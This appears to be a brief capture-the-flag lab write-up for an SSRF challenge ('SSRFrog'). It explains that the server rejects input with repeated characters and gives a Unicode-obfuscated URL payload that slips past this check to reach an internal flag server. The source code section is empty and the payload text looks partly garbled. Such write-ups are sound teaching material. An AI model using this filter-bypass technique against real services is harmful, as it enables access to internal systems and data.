Simple Web 0x13(Lab - SSRFrog)
tags: NTUSTWS CTF Web
Challenge: http://h4ck3r.quest:8501/
Background
Source code
1 | |
- Simply speaking, it’ll call a
Set()object that will filter duplicate characters - We also can find the hint in page source

Exploit
-
The hint said flag is on
http://the.c0o0o0l-fl444g.server.internal:80, so we need to meet the first requirement - every single character is unique.We can use Domain Obfuscator to replace the similar characters.
-
Payload
htTp:/\ⓉₕE.ℭ⓪ᴼ₀o0Ⅼ-Ⓕl₄44ⓖ。ₛⒺʳⓋₑⓇ.㏌ₜeᴿ㎁ˡhtTp:/\ⓉhE。Ⅽ⁰ₒ0O0ℓ-fᴸ④4⁴G.SERvⅇⓡ.ⁱNtₑrnAℒ